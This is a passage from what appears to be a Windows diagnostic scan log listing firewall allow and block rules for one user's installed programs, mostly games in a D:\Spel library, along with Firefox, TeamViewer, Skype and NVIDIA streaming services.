FirewallRules: [TCP Query User{24C29AC6-88E3-4A95-8C8F-45C5B9FE3A52}D:\spel\steam library\steamapps\common\awesomenauts\awesomenauts.exe] => (Allow) D:\spel\steam library\steamapps\common\awesomenauts\awesomenauts.exe
FirewallRules: [UDP Query User{2093AE12-66BF-4861-87C2-F3A96265073F}D:\spel\steam library\steamapps\common\awesomenauts\awesomenauts.exe] => (Allow) D:\spel\steam library\steamapps\common\awesomenauts\awesomenauts.exe
FirewallRules: [TCP Query User{79D77E57-3EE3-4C09-B530-4B3CE5BFAE9D}D:\user profile\documents\octgn\octgn\octgn.exe] => (Allow) D:\user profile\documents\octgn\octgn\octgn.exe
FirewallRules: [UDP Query User{9FBEF8B5-46DC-4444-A23C-6D11B088A8F3}D:\user profile\documents\octgn\octgn\octgn.exe] => (Allow) D:\user profile\documents\octgn\octgn\octgn.exe
FirewallRules: [TCP Query User{F66A678C-7B64-473D-8FC8-06201AADC062}D:\spel\stronghold crusader extreme hd\stronghold crusader.exe] => (Allow) D:\spel\stronghold crusader extreme hd\stronghold crusader.exe
FirewallRules: [UDP Query User{83CBDA9A-1575-490B-AB9F-D26497F68829}D:\spel\stronghold crusader extreme hd\stronghold crusader.exe] => (Allow) D:\spel\stronghold crusader extreme hd\stronghold crusader.exe
FirewallRules: [{84873599-EC78-4B38-A255-15EBC0FC2EA4}] => (Allow) D:\Spel\Star Wars - Empire at War\Forces of Corruption\swfoc.exe
FirewallRules: [{4398A2A4-113B-4DC7-BEE3-C1A06EF2761E}] => (Allow) D:\Spel\Star Wars - Empire at War\Forces of Corruption\swfoc.exe
FirewallRules: [TCP Query User{919F3E59-577F-44C2-AF6C-D2415892A34F}D:\spel\stronghold crusader 2 special edition\bin\win32_release\crusader2.exe] => (Allow) D:\spel\stronghold crusader 2 special edition\bin\win32_release\crusader2.exe
FirewallRules: [UDP Query User{DB90A332-F5EA-49D2-8E43-FCC154C6F37D}D:\spel\stronghold crusader 2 special edition\bin\win32_release\crusader2.exe] => (Allow) D:\spel\stronghold crusader 2 special edition\bin\win32_release\crusader2.exe
FirewallRules: [{5356E309-436E-4CF2-8A99-9856AF496BB4}] => (Allow) D:\Spel\Steam Library\SteamApps\common\SpeedRunners\SpeedRunners.exe
FirewallRules: [{6A61A7BD-6C5A-4910-919B-EC0FC525542A}] => (Allow) D:\Spel\Steam Library\SteamApps\common\SpeedRunners\SpeedRunners.exe
FirewallRules: [TCP Query User{FC0B950D-598B-4C27-A099-212AF8985044}D:\spel\the guild 2 - renaissance\guildii.exe] => (Allow) D:\spel\the guild 2 - renaissance\guildii.exe
FirewallRules: [UDP Query User{00E00E8D-85F0-4758-87E9-221252409F6D}D:\spel\the guild 2 - renaissance\guildii.exe] => (Allow) D:\spel\the guild 2 - renaissance\guildii.exe
FirewallRules: [{443644FB-CA4F-4265-80E1-2401DC456AA3}] => (Allow) D:\Spel\Steam Library\SteamApps\common\FTL Faster Than Light\FTLGame.exe
FirewallRules: [{90227DFB-A226-4335-8C83-E4E636125810}] => (Allow) D:\Spel\Steam Library\SteamApps\common\FTL Faster Than Light\FTLGame.exe
FirewallRules: [{9DB566C5-FE69-4D9B-9888-9BA9DA0FF55F}] => (Allow) D:\Spel\Steam Library\SteamApps\common\Heroes & Generals\hngsteamlauncher.exe
FirewallRules: [{4586C9AA-F881-469D-83C9-0740267F80EE}] => (Allow) D:\Spel\Steam Library\SteamApps\common\Heroes & Generals\hngsteamlauncher.exe
FirewallRules: [TCP Query User{562D9B3F-FF37-4838-A818-95867EC2F001}D:\spel\commandos 3\commandos 3\commandos3.exe] => (Allow) D:\spel\commandos 3\commandos 3\commandos3.exe
FirewallRules: [UDP Query User{35EA472F-9B38-4741-A493-C0E2D320595F}D:\spel\commandos 3\commandos 3\commandos3.exe] => (Allow) D:\spel\commandos 3\commandos 3\commandos3.exe
FirewallRules: [TCP Query User{B1446DB0-ECE7-48AC-882B-A2749E82368B}D:\spel\commandos ammo pack\commandos 1\mpserver.exe] => (Allow) D:\spel\commandos ammo pack\commandos 1\mpserver.exe
FirewallRules: [UDP Query User{B91C6D26-E31D-4DEF-BADB-CD74BA9FDDA1}D:\spel\commandos ammo pack\commandos 1\mpserver.exe] => (Allow) D:\spel\commandos ammo pack\commandos 1\mpserver.exe
FirewallRules: [TCP Query User{7469F425-6C13-47A9-BA48-5D46998357C7}D:\spel\emulator\zsnes151\gammzsnes\zsnesw.exe] => (Allow) D:\spel\emulator\zsnes151\gammzsnes\zsnesw.exe
FirewallRules: [UDP Query User{E94231AC-F983-4BAF-94F9-E888E0ED0C22}D:\spel\emulator\zsnes151\gammzsnes\zsnesw.exe] => (Allow) D:\spel\emulator\zsnes151\gammzsnes\zsnesw.exe
FirewallRules: [TCP Query User{D8F1C82F-6331-486C-B1BA-DDA2C8C2352B}D:\spel\alien isolation\ai.exe] => (Block) D:\spel\alien isolation\ai.exe
FirewallRules: [UDP Query User{561641AD-D5E2-4C02-8785-0EA2474ADFE1}D:\spel\alien isolation\ai.exe] => (Block) D:\spel\alien isolation\ai.exe
FirewallRules: [{C1488CAF-3F1D-4CBE-AC47-2287B7FDD3DF}] => (Allow) D:\Spel\Steam Library\SteamApps\common\DayZ\DayZ_BE.exe
FirewallRules: [{70A5D689-38BB-4673-A25F-19B5D3D737E6}] => (Allow) D:\Spel\Steam Library\SteamApps\common\DayZ\DayZ_BE.exe
FirewallRules: [{38996998-D368-4063-98C0-E06AEB44023C}] => (Allow) D:\Spel\Steam Library\SteamApps\common\Prison Architect\Prison Architect.exe
FirewallRules: [{D6C44EC6-3F87-48CE-BAB8-E211A9DBC273}] => (Allow) D:\Spel\Steam Library\SteamApps\common\Prison Architect\Prison Architect.exe
FirewallRules: [{02F07D3E-F3C3-4053-9743-D91FC25BFE3D}] => (Allow) C:\Program Files (x86)\TeamViewer\TeamViewer.exe
FirewallRules: [{8164E9B5-1CD4-4DEE-973A-2044F5D60E5F}] => (Allow) C:\Program Files (x86)\TeamViewer\TeamViewer.exe
FirewallRules: [{B0415D83-40EB-4823-ABD4-12D1066AB19E}] => (Allow) C:\Program Files (x86)\TeamViewer\TeamViewer_Service.exe
FirewallRules: [{722FA4B4-31E2-4F37-AD00-61F59C03A845}] => (Allow) C:\Program Files (x86)\TeamViewer\TeamViewer_Service.exe
FirewallRules: [TCP Query User{6F83E4F5-AAA5-42DE-8F9D-FBB0BEB63EFC}D:\spel\hammerwatch\hammerwatch.exe] => (Allow) D:\spel\hammerwatch\hammerwatch.exe
FirewallRules: [UDP Query User{DB911C0D-75DB-45A8-86F6-9EF94D76AD42}D:\spel\hammerwatch\hammerwatch.exe] => (Allow) D:\spel\hammerwatch\hammerwatch.exe
FirewallRules: [TCP Query User{2351E6A2-122B-4E05-905A-88BDBF6DB57E}D:\spel\edlaunch\products\combat_tutorial_demo\elitedangerous32.exe] => (Allow) D:\spel\edlaunch\products\combat_tutorial_demo\elitedangerous32.exe
FirewallRules: [UDP Query User{A9B82257-97FF-426A-8632-55C2E5532F54}D:\spel\edlaunch\products\combat_tutorial_demo\elitedangerous32.exe] => (Allow) D:\spel\edlaunch\products\combat_tutorial_demo\elitedangerous32.exe
FirewallRules: [TCP Query User{45050945-6D3F-4D57-9CC8-FDA007D83A8B}D:\spel\edlaunch\products\forc-fdev-d-1010\elitedangerous32.exe] => (Allow) D:\spel\edlaunch\products\forc-fdev-d-1010\elitedangerous32.exe
FirewallRules: [UDP Query User{E7B05CD4-74AA-40C8-9E10-7961E53F21DF}D:\spel\edlaunch\products\forc-fdev-d-1010\elitedangerous32.exe] => (Allow) D:\spel\edlaunch\products\forc-fdev-d-1010\elitedangerous32.exe
FirewallRules: [{DC297BE2-B8D3-4C65-B87D-B63DC2C73B88}] => (Allow) C:\Program Files (x86)\Mozilla Firefox\firefox.exe
FirewallRules: [{45C1643D-955A-4777-BE45-9ABDA65D7E07}] => (Allow) C:\Program Files (x86)\Mozilla Firefox\firefox.exe
FirewallRules: [TCP Query User{A57A95CC-8712-4768-A828-D5C7A3C090F3}D:\spel\blur\blur nosteam\blur.exe] => (Block) D:\spel\blur\blur nosteam\blur.exe
FirewallRules: [UDP Query User{69952427-AF52-443D-A4E1-70B140A97672}D:\spel\blur\blur nosteam\blur.exe] => (Block) D:\spel\blur\blur nosteam\blur.exe
FirewallRules: [TCP Query User{16122460-E2CD-4566-B5DC-42712F3DE8EF}C:\windows\syswow64\dpnsvr.exe] => (Allow) C:\windows\syswow64\dpnsvr.exe
FirewallRules: [UDP Query User{5ECF7D77-E9FA-477D-A7E7-D7ED39C5A5F2}C:\windows\syswow64\dpnsvr.exe] => (Allow) C:\windows\syswow64\dpnsvr.exe
FirewallRules: [{A8D5F529-DCD1-4FDA-BAB7-21D75192F6DA}] => (Allow) D:\Spel\Steam Library\SteamApps\common\Besiege\Besiege.exe
FirewallRules: [{F73EF0DE-71F6-4D78-A751-ADBD04752DF9}] => (Allow) D:\Spel\Steam Library\SteamApps\common\Besiege\Besiege.exe
FirewallRules: [TCP Query User{6874CB65-0F5F-487E-96D2-2E9D41C236F5}D:\spel\stronghold crusader extreme hd\stronghold_crusader_extreme.exe] => (Allow) D:\spel\stronghold crusader extreme hd\stronghold_crusader_extreme.exe
FirewallRules: [UDP Query User{EDC5A005-882F-439D-9609-CD03815D3841}D:\spel\stronghold crusader extreme hd\stronghold_crusader_extreme.exe] => (Allow) D:\spel\stronghold crusader extreme hd\stronghold_crusader_extreme.exe
FirewallRules: [{C1D9F0A3-FF2D-4386-B8A1-FC66E9C94E6C}] => (Allow) D:\Spel\Steam Library\SteamApps\common\Cities_Skylines\Cities.exe
FirewallRules: [{269D0535-C251-4043-A842-DC60623DC634}] => (Allow) D:\Spel\Steam Library\SteamApps\common\Cities_Skylines\Cities.exe
FirewallRules: [{7A779327-2587-4326-9D15-E79A2F3F055F}] => (Allow) D:\Spel\Steam Library\SteamApps\common\Toribash\toribash.exe
FirewallRules: [{8320FB98-828B-4932-9A94-21B867456F90}] => (Allow) D:\Spel\Steam Library\SteamApps\common\Toribash\toribash.exe
FirewallRules: [TCP Query User{9999040C-3648-45A1-8B0E-BDF1B3CA133F}D:\spel\star wars rebellion\rebexe.exe] => (Allow) D:\spel\star wars rebellion\rebexe.exe
FirewallRules: [UDP Query User{90D2846A-4BE4-4E4D-B9D1-2DDDA98866D9}D:\spel\star wars rebellion\rebexe.exe] => (Allow) D:\spel\star wars rebellion\rebexe.exe
FirewallRules: [TCP Query User{C4B6E894-1C14-4A73-AB91-825B611F1E25}D:\spel\diaspora\fs2_open_diaspora_r1.exe] => (Allow) D:\spel\diaspora\fs2_open_diaspora_r1.exe
FirewallRules: [UDP Query User{718E056C-2030-4D29-B4D8-281FF84A0063}D:\spel\diaspora\fs2_open_diaspora_r1.exe] => (Allow) D:\spel\diaspora\fs2_open_diaspora_r1.exe
FirewallRules: [TCP Query User{981E6CCF-911E-4BB6-9BDE-F9BE60F1FC49}C:\program files (x86)\mozilla firefox\firefox.exe] => (Allow) C:\program files (x86)\mozilla firefox\firefox.exe
FirewallRules: [UDP Query User{9D625DCF-2803-443A-A39F-5BB8D22EE3D1}C:\program files (x86)\mozilla firefox\firefox.exe] => (Allow) C:\program files (x86)\mozilla firefox\firefox.exe
FirewallRules: [{796658D6-38B6-4B01-BFF0-6C9766F89B8F}] => (Allow) D:\Spel\Steam Library\SteamApps\common\Crypt of the NecroDancer\NecroDancer.exe
FirewallRules: [{026DA7C2-00A3-4743-8248-993D97678418}] => (Allow) D:\Spel\Steam Library\SteamApps\common\Crypt of the NecroDancer\NecroDancer.exe
FirewallRules: [TCP Query User{25DBFAF5-8C5E-4951-B0F2-E3444F0BA6E4}D:\spel\itg\program\in the groove 2.exe] => (Block) D:\spel\itg\program\in the groove 2.exe
FirewallRules: [UDP Query User{31DB31AD-B312-4DB8-BFED-C898D6B379EA}D:\spel\itg\program\in the groove 2.exe] => (Block) D:\spel\itg\program\in the groove 2.exe
FirewallRules: [{08FD0B95-B6FF-4AAE-AD20-9D98F039FF7B}] => (Allow) D:\Spel\Steam Library\SteamApps\common\Knights and Merchants Historical Version\KM_TPR.exe
FirewallRules: [{F936ABFF-170D-46EF-A8A8-9D3DC696C88F}] => (Allow) D:\Spel\Steam Library\SteamApps\common\Knights and Merchants Historical Version\KM_TPR.exe
FirewallRules: [{A19D7310-0EA2-40F7-ACC1-4F8DF0C9F7C6}] => (Allow) D:\Spel\Steam Library\SteamApps\common\Knights and Merchants Historical Version\hd\Knights_and_Merchants_steam.exe
FirewallRules: [{BEB0FEE9-4558-4DEF-B073-31911291551A}] => (Allow) D:\Spel\Steam Library\SteamApps\common\Knights and Merchants Historical Version\hd\Knights_and_Merchants_steam.exe
FirewallRules: [{9E75A985-D059-493E-84CE-E4DFAD5107DD}] => (Allow) D:\Spel\Steam Library\SteamApps\common\Torchlight II\ModLauncher.exe
FirewallRules: [{662A7F55-A717-4C86-B911-5CE3CFCF5E9F}] => (Allow) D:\Spel\Steam Library\SteamApps\common\Torchlight II\ModLauncher.exe
FirewallRules: [TCP Query User{D2AC309E-9958-42E6-B540-8EF8E661943B}D:\spel\steam library\steamapps\common\projectzomboid\jre64\bin\java.exe] => (Allow) D:\spel\steam library\steamapps\common\projectzomboid\jre64\bin\java.exe
FirewallRules: [UDP Query User{AD605CAB-0CC7-411D-BACF-F5306499F43D}D:\spel\steam library\steamapps\common\projectzomboid\jre64\bin\java.exe] => (Allow) D:\spel\steam library\steamapps\common\projectzomboid\jre64\bin\java.exe
FirewallRules: [{21308C21-15BC-4C73-AC44-2E6EED72A984}] => (Allow) D:\Spel\Steam Library\SteamApps\common\Rochard\Rochard.exe
FirewallRules: [{E5D7FFC3-A7F6-4721-B0F8-4F35BF795C5F}] => (Allow) D:\Spel\Steam Library\SteamApps\common\Rochard\Rochard.exe
FirewallRules: [{6584EECA-A2DA-45B6-BF7E-81C0C250282A}] => (Allow) C:\Program Files\NVIDIA Corporation\NvStreamSrv\NvStreamNetworkService.exe
FirewallRules: [{ECDAABD8-7E3F-40FB-A9CF-3C06B62FFB4C}] => (Allow) C:\Program Files\NVIDIA Corporation\NvStreamSrv\NvStreamNetworkService.exe
FirewallRules: [{0919E39F-10B6-4737-A5C2-62953C825226}] => (Allow) C:\Program Files\NVIDIA Corporation\NvStreamSrv\NvStreamUserAgent.exe
FirewallRules: [{4D350746-BCCC-483E-B8E2-12CAA6A40386}] => (Allow) C:\Program Files\NVIDIA Corporation\NvStreamSrv\nvstreamer.exe
FirewallRules: [{8E40FC5B-4072-47CF-8B69-8006BC435CB1}] => (Allow) C:\Program Files\NVIDIA Corporation\NvStreamSrv\nvstreamer.exe
FirewallRules: [{D08EFB35-473A-442B-A543-E08464001647}] => (Allow) D:\Spel\Steam Library\SteamApps\common\Westerado\WesteradoDB.exe
FirewallRules: [{6B7260B7-CE43-44F8-8F83-96BA07DF356B}] => (Allow) D:\Spel\Steam Library\SteamApps\common\Westerado\WesteradoDB.exe
FirewallRules: [{E2B7627B-628F-4B51-A780-A4EB9ECACEB6}] => (Allow) D:\Spel\Steam Library\SteamApps\common\Trine 3\trine3_launcher.exe
FirewallRules: [{8C9BD548-32BF-49BB-9202-1AA981952EA0}] => (Allow) D:\Spel\Steam Library\SteamApps\common\Trine 3\trine3_launcher.exe
FirewallRules: [TCP Query User{FCC21E56-917A-448D-BC59-743E8D74F0C9}D:\spel\steam library\steamapps\common\trine 3\trine3_64bit.exe] => (Allow) D:\spel\steam library\steamapps\common\trine 3\trine3_64bit.exe
FirewallRules: [UDP Query User{0A5E8A79-55CB-47C8-BB0B-A12F2BC8F14C}D:\spel\steam library\steamapps\common\trine 3\trine3_64bit.exe] => (Allow) D:\spel\steam library\steamapps\common\trine 3\trine3_64bit.exe
FirewallRules: [TCP Query User{1B858E4D-0485-4D54-9183-AE75B20D8854}D:\spel\soldat\soldat.exe] => (Allow) D:\spel\soldat\soldat.exe
FirewallRules: [UDP Query User{8DD1BFC3-FE50-4431-AE63-BD0DB0817ADA}D:\spel\soldat\soldat.exe] => (Allow) D:\spel\soldat\soldat.exe
FirewallRules: [{64BFD6AB-8E20-4AE9-AE23-725CF5FC849A}] => (Allow) C:\Program Files (x86)\Skype\Phone\Skype.exe
FirewallRules: [TCP Query User{A531C7D2-3E9E-4204-9643-7BCBB06617C8}D:\spel\empyrion galactic survival\empyrion.exe] => (Allow) D:\spel\empyrion galactic survival\empyrion.exe
FirewallRules: [UDP Query User{3D1F26BE-E928-4D9F-BFD3-391F2A07FF09}D:\spel\empyrion galactic survival\empyrion.exe] => (Allow) D:\spel\empyrion galactic survival\empyrion.exe
FirewallRules: [{F6B6969E-325A-4E1A-A90C-BEA2B1A1DAAA}] => (Allow) D:\Spel\Steam Library\SteamApps\common\Team Fortress 2\hl2.exe
FirewallRules: [{76E1DBB9-EFBC-48E9-B5BA-FE535A8685E2}] => (Allow) D:\Spel\Steam Library\SteamApps\common\Team Fortress 2\hl2.exe
FirewallRules: [TCP Query User{E3106317-FDAA-4CD0-A39E-A660AF03548C}D:\spel\redalert1_online\cncnet5.exe] => (Allow) D:\spel\redalert1_online\cncnet5.exe
FirewallRules: [UDP Query User{64F31AA8-3C83-4940-8B7A-BB9F03D708A2}D:\spel\redalert1_online\cncnet5.exe] => (Allow) D:\spel\redalert1_online\cncnet5.exe
FirewallRules: [{9A30AC21-A19E-473C-846E-824196B9E37A}] => (Allow) D:\Spel\Steam Library\SteamApps\common\Dawn of War Gold\W40kWA.exe
FirewallRules: [{AC88119B-D54F-4D22-A23F-FC336B5B3FE3}] => (Allow) D:\Spel\Steam Library\SteamApps\common\Dawn of War Gold\W40kWA.exe
FirewallRules: [{F5A1B688-4DE9-4BF7-89D2-D0FE92D6CE43}] => (Allow) D:\Spel\Steam Library\SteamApps\common\Dawn of War Soulstorm\Soulstorm.exe
FirewallRules: [{AB75E7A9-563F-4519-B6BA-128A465905E5}] => (Allow) D:\Spel\Steam Library\SteamApps\common\Dawn of War Soulstorm\Soulstorm.exe
FirewallRules: [{D7EABB63-C0E8-418D-9792-0512F31AD004}] => (Allow) D:\Spel\Steam Library\SteamApps\common\Dawn of War Dark Crusade\darkcrusade.exe
FirewallRules: [{1CB74876-21DE-407F-A0B2-FDE7F9F38EC9}] => (Allow) D:\Spel\Steam Library\SteamApps\common\Dawn of War Dark Crusade\darkcrusade.exe
FirewallRules: [{9B9FF0BC-4B86-405E-AB5E-6F3AA8EE9A66}] => (Allow) D:\Spel\Steam Library\SteamApps\common\Dawn of War Gold\W40k.exe
FirewallRules: [{3AFD306B-53D9-45A5-90DD-884175D2831F}] => (Allow) D:\Spel\Steam Library\SteamApps\common\Dawn of War Gold\W40k.exe
FirewallRules: [TCP Query User{11E3CD2A-BFE1-4427-BF04-4A1C75D2F196}D:\spel\steam library\steamapps\common\dawn of war soulstorm\sscp\soulstorm.exe] => (Allow) D:\spel\steam library\steamapps\common\dawn of war soulstorm\sscp\soulstorm.exe
FirewallRules: [UDP Query User{A69725A6-B8F4-42F0-A9BB-3100B4AC7F21}D:\spel\steam library\steamapps\common\dawn of war soulstorm\sscp\soulstorm.exe] => (Allow) D:\spel\steam library\steamapps\common\dawn of war soulstorm\sscp\soulstorm.exe
FirewallRules: [TCP Query User{B4E0D202-9DD8-4535-BC9F-C83BC97D092D}D:\spel\redalert1_online\ra95-spawn.exe] => (Allow) D:\spel\redalert1_online\ra95-spawn.exe
FirewallRules: [UDP Query User{C88B50F5-D440-440A-8984-9524D85A6860}D:\spel\redalert1_online\ra95-spawn.exe] => (Allow) D:\spel\redalert1_online\ra95-spawn.exe
FirewallRules: [{1B83618F-D02D-42A8-9651-26E419CD1EFD}] => (Allow) D:\Spel\Steam Library\SteamApps\common\PARTICLEMACE\PARTICLEMACE.exe
FirewallRules: [{DCC47D05-2539-4E99-809D-58CD3ED4EBC8}] => (Allow) D:\Spel\Steam Library\SteamApps\common\PARTICLEMACE\PARTICLEMACE.exe
FirewallRules: [TCP Query User{7483B01C-FD81-471A-91F3-F27FD8DED9BD}D:\spel\steam library\steamapps\common\war thunder\aces.exe] => (Allow) D:\spel\steam library\steamapps\common\war thunder\aces.exe
FirewallRules: [UDP Query User{A1599774-927D-4906-A136-8EC9ACF6AFC7}D:\spel\steam library\steamapps\common\war thunder\aces.exe] => (Allow) D:\spel\steam library\steamapps\common\war thunder\aces.exe
FirewallRules: [{680C6942-7D40-4B01-9458-96ADE595E3AA}] => (Allow) C:\Program Files (x86)\Mozilla Firefox\firefox.exe
FirewallRules: [{A9F7449B-0201-40D7-8E35-997E33F94A96}] => (Allow) C:\Program Files (x86)\Mozilla Firefox\firefox.exe
FirewallRules: [{8FA2650D-F133-4798-AA68-FA546B43510E}] => (Allow) D:\Spel\Steam Library\SteamApps\common\Dr Langeskov, The Tiger, and The Terribly Cursed Emerald A Whirlwind Heist\DrLangeskov.exe
FirewallRules: [{F2EF4ACE-4392-41EA-9A3D-818A9B30333A}] => (Allow) D:\Spel\Steam Library\SteamApps\common\Dr Langeskov, The Tiger, and The Terribly Cursed Emerald A Whirlwind Heist\DrLangeskov.exe
FirewallRules: [{6B5C548F-0E30-41E6-8D48-7A162673479B}] => (Allow) D:\Spel\Steam Library\SteamApps\common\Banished\Application-steam-x64.exe
FirewallRules: [{A5C0D7A5-9D50-4F01-8E97-27EC3563F5AB}] => (Allow) D:\Spel\Steam Library\SteamApps\common\Banished\Application-steam-x64.exe
FirewallRules: [TCP Query User{2731C65B-2AA9-4B8E-B4DA-88ACF00DBE5B}D:\spel\helldivers\binaries\x64\helldivers.exe] => (Block) D:\spel\helldivers\binaries\x64\helldivers.exe
FirewallRules: [UDP Query User{2B62053B-324C-4636-91E9-DC9A0B7AAFF4}D:\spel\helldivers\binaries\x64\helldivers.exe] => (Block) D:\spel\helldivers\binaries\x64\helldivers.exe
FirewallRules: [TCP Query User{A66CA3B5-9472-41C7-8BD8-CAA2E73FAD07}D:\spel\edlaunch\products\elite-dangerous-64\elitedangerous64.exe] => (Allow) D:\spel\edlaunch\products\elite-dangerous-64\elitedangerous64.exe
FirewallRules: [UDP Query User{A5C11343-440F-4262-BD52-9E2F69B4F9EF}D:\spel\edlaunch\products\elite-dangerous-64\elitedangerous64.exe] => (Allow) D:\spel\edlaunch\products\elite-dangerous-64\elitedangerous64.exe
FirewallRules: [{9A330E71-4D27-42BC-9BC2-E5E8A8FF02CF}] => (Allow) D:\Spel\Steam Library\SteamApps\common\Screencheat\screencheat.exe
FirewallRules: [{2BC15E28-7E54-4572-A964-B96FC4DB517B}] => (Allow) D:\Spel\Steam Library\SteamApps\common\Screencheat\screencheat.exe
FirewallRules: [{568660FF-CAB1-45BA-B56E-43C90666721F}] => (Allow) D:\Spel\Steam Library\SteamApps\common\Mount Your Friends\MountYourFriends.exe
FirewallRules: [{9B05ECAE-6B44-4697-99A1-45B01D3DD64C}] => (Allow) D:\Spel\Steam Library\SteamApps\common\Mount Your Friends\MountYourFriends.exe
FirewallRules: [{76A57225-C3BD-4B04-9B9A-7A40234CAB14}] => (Allow) D:\Spel\Steam Library\SteamApps\common\Keep Talking and Nobody Explodes\ktane.exe
FirewallRules: [{92128767-4267-40DA-B246-B3621A522DA3}] => (Allow) D:\Spel\Steam Library\SteamApps\common\Keep Talking and Nobody Explodes\ktane.exe
FirewallRules: [TCP Query User{F4A54B63-A8E2-4452-8180-850077D20496}D:\spel\heroes of might and magic 3 complete\heroes3.exe] => (Allow) D:\spel\heroes of might and magic 3 complete\heroes3.exe
FirewallRules: [UDP Query User{1EB19545-AA76-4B4D-8FA0-89BC76AF3D9D}D:\spel\heroes of might and magic 3 complete\heroes3.exe] => (Allow) D:\spel\heroes of might and magic 3 complete\heroes3.exe
FirewallRules: [TCP Query User{1DB3C684-26CE-478E-B0DD-F51D8611E804}D:\spel\factorio_0.12.20\bin\x64\factorio.exe] => (Allow) D:\spel\factorio_0.12.20\bin\x64\factorio.exe
FirewallRules: [UDP Query User{D68A1112-A5DA-4D38-A500-B16AB85A58D8}D:\spel\factorio_0.12.20\bin\x64\factorio.exe] => (Allow) D:\spel\factorio_0.12.20\bin\x64\factorio.exe
FirewallRules: [TCP Query User{7A51F80D-554A-454F-9E5A-F539A4E5C285}D:\spel\steam library\steamapps\common\space\spacegame\binaries\win64\spserver.exe] => (Allow) D:\spel\steam library\steamapps\common\space\spacegame\binaries\win64\spserver.exe
FirewallRules: [UDP Query User{5D8931EF-4E7D-4C1D-9E38-AF85FB859C23}D:\spel\steam library\steamapps\common\space\spacegame\binaries\win64\spserver.exe] => (Allow) D:\spel\steam library\steamapps\common\space\spacegame\binaries\win64\spserver.exe
FirewallRules: [{6853BAB0-1C4A-4E18-B5B6-EECEF7E1DF09}] => (Allow) D:\Spel\Steam Library\SteamApps\common\Depth\Binaries\Win32\DepthGame.exe
FirewallRules: [{B567282B-F73F-4CEA-BE2F-2CBE938EAB18}] => (Allow) D:\Spel\Steam Library\SteamApps\common\Depth\Binaries\Win32\DepthGame.exe
FirewallRules: [{492F1B4D-3B0C-4C98-B606-579059012453}] => (Allow) D:\Spel\Steam Library\SteamApps\common\Kerbal Space Program\KSP.exe
FirewallRules: [{56B6A10D-4D74-4722-BC01-33852584F8CD}] => (Allow) D:\Spel\Steam Library\SteamApps\common\Kerbal Space Program\KSP.exe
FirewallRules: [{B86F862D-C8D6-4C3E-B788-B5C6D93F3C1A}] => (Allow) D:\Spel\Steam Library\SteamApps\common\SteamVRPerformanceTest\bin\win64\vr.exe
FirewallRules: [{E649E9B4-0ABB-490F-9692-A3E981030DF2}] => (Allow) D:\Spel\Steam Library\SteamApps\common\SteamVRPerformanceTest\bin\win64\vr.exe
FirewallRules: [{FA2A2058-9CC5-4459-9D95-47A89CD852E7}] => (Allow) D:\Spel\Steam Library\SteamApps\common\Orcs Must Die 2\build\release\OrcsMustDie2.exe
FirewallRules: [{ADCF1868-E26E-4EA4-85F6-A277BB4D94D6}] => (Allow) D:\Spel\Steam Library\SteamApps\common\Orcs Must Die 2\build\release\OrcsMustDie2.exe
FirewallRules: [TCP Query User{DA1A4364-51A0-4A13-A617-34927AD2E0B4}D:\spel\steam library\steamapps\common\orcs must die 2\build\game\orcsmustdie2.exe] => (Allow) D:\spel\steam library\steamapps\common\orcs must die 2\build\game\orcsmustdie2.exe
FirewallRules: [UDP Query User{53DB7273-588B-4631-B918-C1DFCF0B5364}D:\spel\steam library\steamapps\common\orcs must die 2\build\game\orcsmustdie2.exe] => (Allow) D:\spel\steam library\steamapps\common\orcs must die 2\build\game\orcsmustdie2.exe
FirewallRules: [{0974B5FB-67A5-4311-93C8-3E31C934201B}] => (Allow) D:\Spel\Steam Library\SteamApps\common\Battlefleet Gothic Armada\BattleFleetGothic.exe
FirewallRules: [{23BBB59C-4E38-4F12-ACB5-AF621E695D47}] => (Allow) D:\Spel\Steam Library\SteamApps\common\Battlefleet Gothic Armada\BattleFleetGothic.exe
FirewallRules: [TCP Query User{14EF59FD-4CBE-4477-BBF6-400D49178375}D:\spel\steam library\steamapps\common\battlefleet gothic armada\battlefleetgothic\binaries\win64\battlefleetgothic-win64-shipping.exe] => (Allow) D:\spel\steam library\steamapps\common\battlefleet gothic armada\battlefleetgothic\binaries\win64\battlefleetgothic-win64-shipping.exe
FirewallRules: [UDP Query User{6417FD98-D5AA-4DA6-9D9A-088A5C581014}D:\spel\steam library\steamapps\common\battlefleet gothic armada\battlefleetgothic\binaries\win64\battlefleetgothic-win64-shipping.exe] => (Allow) D:\spel\steam library\steamapps\common\battlefleet gothic armada\battlefleetgothic\binaries\win64\battlefleetgothic-win64-shipping.exe
FirewallRules: [TCP Query User{8623F9D7-F7B7-45A6-9E24-202C5CFE17C3}D:\spel\steam library\steamapps\common\guilty gear xrd -sign-\binaries\win32\guiltygearxrd.exe] => (Allow) D:\spel\steam library\steamapps\common\guilty gear xrd -sign-\binaries\win32\guiltygearxrd.exe
FirewallRules: [UDP Query User{D93CC1A3-71E8-4230-9363-9E43414DAB17}D:\spel\steam library\steamapps\common\guilty gear xrd -sign-\binaries\win32\guiltygearxrd.exe] => (Allow) D:\spel\steam library\steamapps\common\guilty gear xrd -sign-\binaries\win32\guiltygearxrd.exe
FirewallRules: [{E9AB914A-8CDB-4D70-B686-42574EAB783E}] => (Allow) D:\Spel\Steam Library\SteamApps\common\Environmental Station Alpha\Environmental Station Alpha.exe
FirewallRules: [{074E5D98-B4C1-47E6-BE65-7067C306E683}] => (Allow) D:\Spel\Steam Library\SteamApps\common\Environmental Station Alpha\Environmental Station Alpha.exe
FirewallRules: [{EA0D1741-86B9-4111-A53B-D44A614EC2CD}] => (Allow) D:\Spel\Steam Library\SteamApps\common\Prison Architect\Prison Architect Safe Mode.exe
FirewallRules: [{A81051AC-4649-42D9-B644-43E4ADEB4EC7}] => (Allow) D:\Spel\Steam Library\SteamApps\common\Prison Architect\Prison Architect Safe Mode.exe
FirewallRules: [{4ECF7C43-C7AC-41F1-AA43-78B4B7C00AA2}] => (Allow) D:\Spel\Steam Library\SteamApps\common\Kerbal Space Program\KSP_x64.exe
FirewallRules: [{2D1981B0-37C6-4A34-83FF-C25CDBFED6AB}] => (Allow) D:\Spel\Steam Library\SteamApps\common\Kerbal Space Program\KSP_x64.exe
FirewallRules: [{750F14FD-12C1-459B-97AF-8045788F4A02}] => (Allow) C:\Program Files (x86)\Ubisoft\Ubisoft Game Launcher\UbisoftGameLauncher.exe
FirewallRules: [{BFCEA83A-D98F-4CE9-AF70-0BEB8A98845D}] => (Allow) C:\Program Files (x86)\Ubisoft\Ubisoft Game Launcher\UbisoftGameLauncher.exe
